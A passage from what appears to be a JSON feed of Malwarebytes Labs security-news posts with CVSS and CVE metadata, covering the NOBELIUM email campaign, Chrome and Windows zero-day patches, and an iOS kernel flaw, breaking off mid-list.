wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that are disguised since they are obscured behind the mailing service\u2019s URL. Many similar services use this type of mechanism to simplify the sharing of files while providing insights into by who and when links are clicked.\n\n### Finding the most effective delivery method\n\nThe early beginnings of these campaigns were first noticed January 28, 2021, when the actor was seemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging [Firebase](<https://firebase.google.com/>) URLs to record targets who clicked. Malicious payloads were not observed during this early activity.\n\nIn the next evolution of the campaign, MSTIC says it observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. If a receiver opened the HTML attachment, embedded JavaScript code in the HTML wrote an ISO file to disc and encouraged the target to open it.\n\nSimilar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the HTML document based on the intended target. MSTIC says it observed the actor encoding the ISO within the HTML document itself; redirecting from the HTML document to an ISO, which contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within it; and replacing the HTML with a URL that led to a website that spoofed the targeted organization and hosted the ISO file.\n\n### The ISO payload\n\nAs we noted above, the payload is delivered via an ISO file. When ISO files are opened they are mounted much like an external or network drive. Threat actors may deploy a container into an environment to facilitate execution or evade defenses. And sometimes they will deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, a threat actor may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In this case, a shortcut file (`.lnk`) would execute an accompanying DLL, which would result in a Cobalt Strike Beacon executing on the host. It is worth noting that the DLL is a hidden file. Cobalt Strike Beacons call out to the attacker&#x27;s infrastructure via port 443.\n\n### Experimenting with the payload\n\nThe delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for [CVE-2021-1879](<https://nvd.nist.gov/vuln/detail/CVE-2021-1879>) was served.\n\nDuring the waves in April, the threat actor stopped using Firebase, and no longer tracked users. Their techniques shifted to encoding the ISO inside the HTML document. Target host details were now stored by the payload on a remote server via the use of the `api.ipify.org` service. The threat actor would sometimes employ checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.\n\n### The latest surge\n\nOn May 25, the NOBELIUM campaign was noticed to escalate significantly, attempting to target around 3,000 individual accounts across more than 150 organizations. Due to the high volume of emails distributed in this campaign, many automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy settings or prior to detections being in place.\n\n### The goal\n\nThe successful deployment of the payload enables NOBELIUM to gain persistent access to the compromised machines. The successful execution of these malicious payloads would also enable NOBELIUM to conduct further malicious activity, such as lateral movement, data exfiltration, and delivery of additional malware.\n\n### Indiciators of compromise (IOCs)\n\nIn its [warning](<https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/>), MSTIC provides a list of indicators of compromise from the large-scale campaign that launched on May 25, 2021. The organization notes that the attack is still active, these indicators should not be considered exhaustive for this observed activity.\n\nMalwarebytes detected the Cobalt Strike payload prior to the attack\n\nMalwarebytes also blocks the domain theyardservice.com\n\nStay safe, everyone!\n\nThe post [SolarWinds attackers launch new campaign](<https://blog.malwarebytes.com/threat-analysis/2021/05/solarwinds-attackers-launch-new-campaign/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-28T14:24:01", "type": "malwarebytes", "title": "SolarWinds attackers launch new campaign", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-05-28T14:24:01", "id": "MALWAREBYTES:D94336E4CB7536CC9CECC8C6FF696A77", "href": "https://blog.malwarebytes.com/threat-analysis/2021/05/solarwinds-attackers-launch-new-campaign/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-14T18:35:22", "description": "Google _[announced](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>)_ on Monday that it will be issuing patches for 11 high severity vulnerabilities found in Chrome, including two that are currently being exploited in the wild. The patch, which is part of the Stable Channel Update for Chrome 93 (93.0.4577.82), will be released for Windows, Mac, and Linux (if it hasn\u2019t already). Chrome users are expected to see the roll out in the coming days and weeks.\n\nReaders should note that other popular browsers such as Brave and Edge are also Chromium-based and therefore likely to be vulnerable to these flaws too. Keep an eye out for updates.\n\nYou can check what version of Chrome you are running by opening About Google Chrome from the main menu.\n\nThe About Google Chrome screen tells you what version you are running and whether it is up to date\n\n### The vulnerabilities\n\nThe fixes address high severity vulnerabilities reported to Google by independent researchers from as early as August of this year. That said, the company has included names of the researchers who found the flaws in their announcement.\n\nThe two vulnerabilities that are being actively exploited\u2014namely, [CVE-2021-30632](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30632>) and [CVE-2021-30633](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30633>)\u2014were submitted anonymously. The former is an &quot;Out of bounds write&quot; flaw in the V8 JavaScript engine and the latter is a &quot;Use after free&quot; bug in the Indexed DB API.\n\nBecause threat actors are currently exploiting the two aforementioned vulnerabilities, Google provides little to no information on how the attacks against these weaknesses are being carried out, or other precautionary measures users should be looking out for. Per Google:\n\n> Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed.\n\n### V8, the thorn in Chrome&#x27;s side?\n\nNobody will be surprised to see that one of the in-the-wild exploits affects Chrome&#x27;s V8 engine. \n\nAt the heart of every modern web browser sits a JavaScript interpreter, a component that does much of the heavy lifting for interactive web apps. In Chrome, that interpreter is V8. These components need to accommodate frequent updates and adhere to a bewildering array of web standards, while also being both fast and secure.\n\nChrome&#x27;s [V8](<https://v8.dev/>) JavaScript engine has been a significant source of security problems. So significant in fact, that in August Microsoft\u2014whose Edge browser is based on Chrome\u2014announced an experimental project called [Super Duper Secure Mode](<https://blog.malwarebytes.com/reports/2021/08/edges-super-duper-secure-mode-benchmarked-how-much-speed-would-you-trade-for-security/>) that aims to tackle the rash of V8 problems by simply turning an important part of it off.\n\nA little under half of the CVEs issued for V8 relate to its Just-in-Time (JIT) compiler, and more than half of all \u2018in-the-wild\u2019 Chrome exploits abuse JIT bugs. Just-in-time compilation is an important performance feature and turning it off is a direct trade of speed for security. How much? According our quick-and-dirty testing, turning off the JIT compiler makes JavaScript execution twice as slow in Edge.\n\n### 11 zero-days and counting\n\nTo date, the Google Chrome team has patched 11 zero-day vulnerabilities in 2021. Previous patches are from the following vulnerabilities, some of which we have covered here in the Malwarebytes Labs blog:\n\n * [_CVE-2021-21148_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/02/update-now-chrome-patches-zero-day-that-was-exploited-in-the-wild/>)\n * [_CVE-2021-21166_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>)\n * CVE-2021-21193\n * [_CVE-2021-21206_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/>)\n * [_CVE-2021-21220_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/>)\n * CVE-2021-21224\n * CVE-2021-30551\n * CVE-2021-30554\n * CVE-2021-30563\n\nWith so much bad PR, you might expect Chrome&#x27;s market share to suffer; yet, it remains by far the most popular browser. Users\u2014and the Google Chrome brand\u2014seem unaffected.\n\nMake sure you update your Chrome or Chromium-based browser once you see the patch available, or better still, make sure your browser is set to [update itself](<https://support.google.com/chrome/answer/95414?hl=en-GB&co=GENIE.Platform%3DDesktop#:~:text=Go%20to%20'About%20Google%20Chrome,Chrome%20to%20apply%20the%20update.>).\n\nStay safe!\n\nThe post [Update now! Google Chrome fixes two in-the-wild zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-google-chrome-fixes-two-in-the-wild-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T16:28:47", "type": "malwarebytes", "title": "Update now! Google Chrome fixes two in-the-wild zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-14T16:28:47", "id": "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-google-chrome-fixes-two-in-the-wild-zero-days/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-04T14:27:39", "description": "The Microsoft Browser Vulnerability Research team has found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability ([CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)) in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the vulnerability. It is [not the first time](<https://www.tenable.com/blog/cve-2019-13720-use-after-free-zero-day-in-google-chrome-exploited-in-the-wild>) that Chrome&#x27;s audio component was targeted by an exploit.\n\n### No details available\n\nFurther details about the vulnerability are restricted until a majority of Chrome users have updated to the patched version of the software. What we do know is that it concerns an object lifecycle issue in the audio component of the browser.\n\nAn object lifecycle is used in object oriented programming to describe the time between an object&#x27;s creation and its destruction. Outside of the lifecycle the object is no longer valid, which could lead to a vulnerability.\n\nFor example, if everything goes as planned with the lifecycle the correct amount of computer memory is allocated and reclaimed at the right times. If it doesn&#x27;t go well, and memory is mismanaged, that could lead to a flaw \u2013 or vulnerability - in the program.\n\n### More vulnerabilities patched in the update\n\nAs per usual Google patched several other vulnerabilities and bugs in the same update. Some of the other vulnerabilities were listed with high severity:\n\nGoogle said that it fixed three heap-buffer overflow flaws in the TabStrip ([CVE-2021-21159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21159>), [CVE-2021-21161](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21161>)) and WebAudio ([CVE-2021-21160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21160>)) components. A high-severity use-after-free error ([CVE-2021-21162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21162>)) was found in WebRTC. Two other high-severity flaws include an insufficient data validation issue in Reader Mode ([CVE-2021-21163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21163>)) and an insufficient data validation issue in Chrome for iOS ([CVE-2021-21164](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21164>)).\n\n### The CVE\u2019s\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\n * CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. Heap is the name for a region of a process\u2019 memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.\n * CVE-2021-21160: Heap buffer overflow in WebAudio.\n * CVE-2021-21162: Use after free in WebRTC. Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program\u2019s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. WebRTC allows programmers to add real-time communication capabilities to their application.\n * CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation could allow an attacker to use especially crafted input to manipulate a program.\n * CVE-2021-21164: Insufficient data validation in Chrome for iOS.\n\nWhen more details about the vulnerabilities come to light it&#x27;s possible that more exploits for them will be found in the wild. It depends a lot on how easy they are to abuse, and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now. \n\n### How to update\n\nThe easiest way to do it is to allow Chrome to update automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn\u2019t hurt to check now and then. And now would be a good time.\n\nMy preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings &gt; About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is **Relaunch** the browser.\n\n_After the update your version should be at 89.0.4.4389.72 or later_\n\nStay safe, everyone!\n\nThe post [Update now! Chrome fix patches in-the-wild zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T13:24:38", "type": "malwarebytes", "title": "Update now! Chrome fix patches in-the-wild zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21166"], "modified": "2021-03-04T13:24:38", "id": "MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-15T08:32:16", "description": "This patch Tuesday harvest was another big one. The Windows updates alone included seven zero-day vulnerability updates, two of them are actively being used in the wild by a group called PuzzleMaker, four others that have also been seen in the wild, plus one other zero-day vulnerability not known to have been actively exploited. Add to that 45 vulnerabilities that were labelled important, and security updates for Android, Adobe, SAP, and Cisco. You can practically see the IT staff scrambling to figure out what to do first and what needs to be checked before applying the patches.\n\n### PuzzleMaker\n\nSecurity researchers have discovered a new threat actor dubbed [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>), that was found using a chain of Google Chrome and Windows 10 zero-day exploits in highly targeted attacks against multiple companies worldwide. Unfortunately the researchers were unable to conclusively identify the Chrome vulnerability that was used (but they do have a suspect). The good news is that the two Windows vulnerabilities in the attack chain were included in the Windows 10 KB5003637 &amp; KB5003635 cumulative updates. These vulnerabilities are listed as [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), a Windows kernel information disclosure vulnerability, and [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>), a Windows NTFS elevation of privilege vulnerability.\n\n### Other critical issues\n\nThe other critical patches made available by Microsoft this June include these actively exploited vulnerabilities:\n\n * [CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), a Microsoft DWM Core Library Elevation of Privilege Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n * [CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>) Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n * [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>) another Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n\nNot (yet) actively exploited zero day vulnerability:\n\n * [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>) Windows Remote Desktop Services Denial of Service Vulnerability.\n\nOther critical updates:\n\n * [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>) Microsoft SharePoint Server Remote Code Execution Vulnerability.\n * [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) Scripting Engine Memory Corruption Vulnerability.\n * [CVE-2021-31967](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31967>) VP9 Video Extensions Remote Code Execution Vulnerability.\n * [CVE-2021-31985](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31985>) Microsoft Defender Remote Code Execution Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n\n### Android\n\nThe [Android Security Bulletin of June 7](<https://source.android.com/security/bulletin/2021-06-01>) mentions a critical security vulnerability in the System component that &quot;could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process&quot;, which is as bad as it sounds. That vulnerability, listed as [CVE-2021-0507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-0507>), could allow an attacker to take control of a targeted Android device unless it&#x27;s patched.\n\n### Cisco\n\nCisco has issued a [patch](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-ssl-decrypt-dos-DdyLuK6c>) for a vulnerability in the software-based SSL/TLS message handler of Cisco Firepower Threat Defense (FTD) Software, that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. An attacker could exploit this vulnerability by sending a crafted SSL/TLS message **through** an affected device. SSL/TLS messages sent **to** an affected device do not trigger this vulnerability. Cisco informs us that there is no workaround for this issue. Patching is the only solution.\n\n### SAP\n\nIn the SAP advisory for [Security Patch Day \u2013 June 2021](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) we can find two issues that are labelled as \u201cHot News\u201d:\n\n * [CVE-2021-276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>)[0](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>)[2](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>) SAP Commerce, versions - 1808, 1811, 1905, 2005, 2011, Backoffice application allows certain authorized users to create source rules which are translated to drools rule when published to certain modules within the application. An attacker with this authorization can inject malicious code in the source rules and perform remote code execution enabling them to compromise the confidentiality, integrity and availability of the application.\n * [CVE-2021-27610](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27610>) Improper Authentication in SAP NetWeaver ABAP Server and ABAP Platform.\n\n### Adobe\n\nTo top things off, Adobe has released a giant [Patch ](<https://helpx.adobe.com/security.html>)[Tuesday security update](<https://helpx.adobe.com/security.html>) release that fixes vulnerabilities in ten applications, including Adobe Acrobat (of course), Reader, and Photoshop. Notably five vulnerabilities in Adobe Acrobat and Reader were fixed that address multiple critical vulnerabilities. Acrobat&#x27;s determination to cement its place as [the new Flash](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>) shows no sign of dimming.\n\nSuccessful exploitation could lead to arbitrary code execution in the context of the current user on both Windows and macOS. The same is true for two critical vulnerabilities in Photoshop that could lead to arbitrary code execution in the context of the current user.\n\n### CVE\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Which is why we try and link you to the Mitre list of CVE\u2019s where possible. It allows interested parties to find and compare vulnerabilities.\n\nHappy patching, everyone!\n\nThe post [Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-09T14:50:52", "type": "malwarebytes", "title": "Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0507", "CVE-2021-27602", "CVE-2021-27610", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T14:50:52", "id": "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T08:35:39", "description": "Apple has released a security update for iOS and iPad that addresses a critical vulnerability reportedly being exploited in the wild.\n\nThe update has been made available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one is listed as [CVE-2021-30883](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30883>) and allows an application to execute arbitrary code with kernel privileges. Kernel privileges can be achieved by using a memory corruption issue in the &quot;IOMobileFrameBuffer&quot; component.\n\nKernel privileges are a serious matter as they offer an attacker more than administrator privileges. In kernel mode, the executing code has complete and unrestricted access to the underlying hardware. It can execute any CPU instruction and reference any memory address. Kernel mode is generally reserved for the lowest-level, most trusted functions of the operating system.\n\nResearchers have already found that this vulnerability is exploitable from the browser, which makes it extra worrying.\n\n> We can confirm that the recently patched iOS 15.0.2 vulnerability, CVE-2021-30883, is also accessible from the browser: perfect for 1-click &amp; water-holing mobile attacks. This vulnerability is exploited in the wild. Update as soon as possible. <https://t.co/dhogxTM6pT>\n> \n> -- ZecOps (@ZecOps) [October 12, 2021](<https://twitter.com/ZecOps/status/1447804721771606016?ref_src=twsrc%5Etfw>)\n\nWatering holes are used as a highly targeted attack strategy. The attacker infects a website where they knows the intended victim(s) visits regularly. Depending on the nature of the infection, the attacker can single out their intended target(s) or just infect anyone that visits the site unprotected.\n\n### IOMobileFrameBuffer\n\nIOMobileFramebuffer is a kernel extension for managing the screen framebuffer. An earlier vulnerability in this extension, listed as [CVE-2021-30807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>) was tied to the [Pegasus spyware](<https://blog.malwarebytes.com/privacy-2/2021/07/pegasus-spyware-has-been-here-for-years-we-must-stop-ignoring-it/>). This vulnerability also allowed an application to execute arbitrary code with kernel privileges. Coincidence? Or did someone take the entire IOMobileFramebuffer extension apart and save up the vulnerabilities for a rainy day?\n\nAnother iPhone exploit called [FORCEDENTRY](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/latest-iphone-exploit-forcedenrty-used-to-launch-pegasus-attack-against-bahraini-activists/>) was found to be used against Bahraini activists to launch the Pegasus spyware. Researchers at Citizen Lab disclosed this vulnerability and code to Apple, and it was listed as CVE-2021-30860.\n\n### Undisclosed\n\nAs is usual for Apple, both the researcher that found the vulnerability and the circumstances under which the vulnerability used in the wild are kept secret. Apple didn&#x27;t respond to a query about whether the previously found bug was being exploited by NSO Group&#x27;s Pegasus surveillance software.\n\n### Zero-days for days\n\nOver the last months Apple has had to close quite a few zero-days in iOS, iPadOS,and macOS. Seventeen if I have counted correctly.\n\n * [CVE-2021-1782](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1782>) - iOS-kernel: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-1870](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1870>) \u2013 WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-1871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1871>) \u2013 WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-1879](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1879>) \u2013 WebKit: Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>) \u2013 Gatekeeper: A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30661>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30663](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30663>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution.\n * [CVE-2021-30665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30665>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30666](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30666>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30713](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30713>) \u2013 TCC: A malicious application may be able to bypass Privacy preferences. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30761](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30761>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * 